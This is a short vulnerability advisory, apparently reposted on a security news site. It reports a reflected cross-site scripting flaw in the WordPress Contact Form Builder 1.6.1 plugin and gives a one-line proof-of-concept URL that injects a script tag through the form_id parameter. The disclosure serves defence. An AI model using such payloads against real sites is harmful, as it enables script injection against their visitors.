Home Tools Exploits & CVE's WordPress Contact Form Builder 1.6.1 Cross Site Scripting

WordPress Contact Form Builder 1.6.1 Cross Site Scripting

February 8, 2022

552

WordPress Contact Form Builder plugin version 1.6.1 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/contact-forms-builder/
# Version: 1.6.1
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>

WordPress Contact Form Builder 1.6.1 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Ex-FSB officer sentenced to 9 years in prison for helping Russian...

Phishing-as-a-service platform LabHost shut down in global operation

NATO to launch new cyber center to contest cyberspace ‘at all...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Online Reviewer System 1.0 SQL Injection

Emporium eCommerce Online Shopping CMS 1.2 SQL Injection

Qualcomm Adreno GPU PID Reuse Mapping Leak